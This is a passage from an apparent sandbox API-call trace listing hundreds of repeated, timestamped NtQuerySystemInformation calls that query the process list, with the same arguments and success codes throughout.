ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, 